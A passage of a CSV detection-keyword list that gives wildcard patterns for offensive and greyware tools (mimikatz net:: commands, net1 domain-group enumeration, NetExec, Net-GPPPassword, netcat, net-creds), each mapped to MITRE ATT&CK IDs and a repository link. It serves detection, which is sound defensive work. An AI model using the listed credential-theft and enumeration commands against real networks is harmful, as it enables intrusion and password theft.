win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::if*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::serverinfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::session*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::share*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::stats*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::tod*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::user*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::wsession*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net_dclist *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*net_localgroup_member -Group*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*net_portscan.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*net_recon.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net1 group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1 localgroup admin*","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","N/A","Discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Account Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Backup Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Domain Computers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Domain Controllers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Enterprise Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Exchange Trusted Subsystem* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Microsoft Exchange Servers* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Print Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Schema Admins* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*net1.exe* group *Server Operators* /domain*","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*netCat*","greyware_tool_keyword","netcat","Netcat is a featured networking utility which reads and writes data across network connections","T1043 - T1052 - T1071 - T1095 - T1132 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","http://netcat.sourceforge.net/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","0","N/A","N/A","10","1562","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z" +"*netdiscover -i * -r */24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*netero1010/Quser-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*netero1010/ScheduleRunner*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" +"*netero1010/ServiceMove-BOF*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" +"*NetExec ldap * --*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec ldap * --dc-ip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec ldap * -M enum_trusts*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec winrm *--*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Net-GPPPassword.cs*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" +"*Net-GPPPassword.exe*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" +"*Net-GPPPassword_dotNET*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" +"*Net-GPPPassword-master*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" +"*nethunter-*.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nethunter-*.zip*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nethunter-*-oos-ten-kalifs-full.zip*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*netlm_downgrade.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NETLMv2_fmt_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*NetLoader.exe --path *.exe *","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*NetLoader-master*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*netloggedonusers.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*netlogon_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*netntlm.pl *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*NetNTLMtoSilverTicket.git*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*NetNTLMtoSilverTicket-master*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*netpass.exe*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*netpass.zip*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport 